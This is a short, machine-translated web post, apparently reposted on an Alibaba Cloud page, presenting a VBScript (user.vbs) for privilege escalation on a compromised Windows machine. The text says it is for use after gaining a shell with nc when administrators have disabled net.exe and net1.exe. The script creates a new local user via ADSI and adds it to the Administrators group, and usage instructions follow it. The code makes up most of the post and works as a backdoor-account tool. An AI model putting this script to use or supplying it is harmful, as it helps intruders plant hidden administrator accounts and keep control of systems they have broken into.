Scripts without net Privilege Escalation

Source: Internet
Author: User

The real script that can be used by users without the net addition system .. When we raise the right, the nc rebounded and raised the right. The Administrator disabled net1 and net. We can upload a script ,, achieve real users without adding a net system .. The script code is as follows:

Struser = wscript. arguments (0)
Strpass = wscript. arguments (1)

Set lp = createObject ("WSCRIPT. NETWORK ")
Oz = "WinNT: //" & lp. ComputerName
Set ob = GetObject (oz)
Set oe = GetObject (oz & "/Administrators, group ")
Set od = ob. create ("user", struser)
Od. SetPassword strpass
Od. SetInfo
Set of = GetObject (oz & "/" & struser & ", user ")
Oe. Add (of. ADsPath)

For Each admin in oe. Members
If struser = admin. Name then
Wscript. echo struser & "created successfully! "
Wscript. quit
End if
Next

Wscript. echo struser & "User Creation failed! "

 

Save the preceding code as user. vbs. Usage: cscript user. vbs user Password

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.